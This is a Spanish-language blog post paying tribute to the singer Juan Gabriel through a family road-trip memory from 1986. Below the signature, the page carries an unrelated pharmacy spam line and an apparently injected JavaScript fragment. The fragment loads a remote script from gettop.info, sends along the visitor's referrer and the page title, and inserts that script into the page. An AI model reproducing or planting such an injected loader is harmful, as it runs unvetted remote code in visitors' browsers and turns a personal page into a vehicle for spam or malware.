A 8 meses de tu partida… te fuiste pero te quedaste eternamente

Comparte !

Voy a narrar una experiencia personal ( o anécdota )
Corría el año de 1986 o algo así, una de mis hermanas acababa de terminar la carrera de Medicina y como reconocimiento a su esfuerzo y siguiendo la especialidad en Patología mi padre le regaló un auto, mismo que nos lanzamos desde Monterrey hasta Mazatlán, Sinaloa (más de 800 km) y como el carro estaba “nuevecito” dijo mi papá: pues hay que “corretearlo” y por cuestiones de trabajo él no podía acompañarnos, yo en ese tiempo no manejaba y mi mamá le pidió a uno de sus hermanos que si podía ir, y el ni tardo ni perezoso aceptó pues al igual que yo y mis demás hermanos teníamos vacaciones escolares.

Recuerdo que al llegar a la casa de mi tío Oscar salió con su maleta y un estuche de madera en sus manos, guardó su maleta en la cajuela y al subirse al carro le vi el estuche y le pregunté que si le ayudaba y me dice: no, amiga! ( así siempre me ha dicho él ) y pregunta:
“Les gusta Juan Gabriel?????? Y todos respondimos a coro: Siiiiiiiiiiiiiiiiiiii !!!! Y todos reimos al mismo tiempo.
Abrió su estuche, yo me moría de la curiosidad por saber que traía y era su colección de casets de Juan Gabriel, pues era su ídolo…..y a lo largo de ese viaje el Divo nos acompañó con su música, viajó con nosotros, a lo largo de la distancia reímos, cantamos, lloramos…de todo! Fue una inolvidable y maravillosa experiencia y agradezco a mi tío por habernos acompañado en esa aventura y permitirnos conocer también sus gustos musicales!

Juan Gabriel aunque nunca leas éste relato confirmo que siempre me acompañó tu música, primero por mis hermanas y después en el diario caminar de la vida, como en ésta anécdota, y después te fui descubriendo más y más.

Gracias por tu arte, tu talento, tu hambre y constancia de ser artista y ver realizadas todas tus metas.
Gracias por llevar y poner el nombre de México en todo lo alto.
Gracias por tu triunfo.
La herida de tu partida aún duele, y mucho…aún hay muchas canciones que de tan sólo oirlas me gana el llanto y la nostalgia.
Para mi, no has muerto, porque tu sentir está ahí, en tus múltiples melodías.
Vives en cada corazón y en cada mente diariamente!
A 8 meses de tu partida… te fuiste pero te quedaste eternamente!
Con admiración y respeto para el más querido.

Olga Rodríguez De León

 

 

online canada pharmacy discount



s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

shares